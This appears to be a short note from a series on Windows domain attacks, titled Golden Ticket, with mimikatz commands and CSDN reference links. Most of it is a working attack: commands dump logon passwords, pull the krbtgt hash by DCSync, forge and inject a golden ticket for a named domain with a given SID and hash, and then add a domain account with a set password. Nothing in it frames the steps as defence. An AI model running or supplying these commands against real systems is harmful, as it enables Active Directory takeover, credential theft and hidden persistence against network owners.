9. Golden Ticket
Run with administrator privileges: mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /domain:bihuo.cn /user:krbtgt
Create the golden ticket
1. Domain name: bihuo.cn
2. Domain SID: S-1-5-21-2244602263-1259606959-4127206907-500
3. NTLM hash of the domain's krbtgt account: 6a4c71ef895a18483f0f03fd3fafd681
4. The username to forge
kerberos::golden /domain:bihuo.cn /sid:S-1-5-21-2244602263-1259606959-4127206907-500 /krbtgt:6a4c71ef895a18483f0f03fd3fafd681 /admin:Administrator /ticket:bihuo.kirbi
klist purge (clears the cached credentials)
kerberos::ptt C:\Users\bihuo\Desktop\mimikatz\x64\bihuo.kirbi
net user bihuo17_new 123456abcY /add /domain
Reference articles:
https://blog.csdn.net/Canterlot/article/details/126694935
https://blog.csdn.net/qq_50854790/article/details/123150372
https://blog.csdn.net/weixin_40412037/article/details/113348310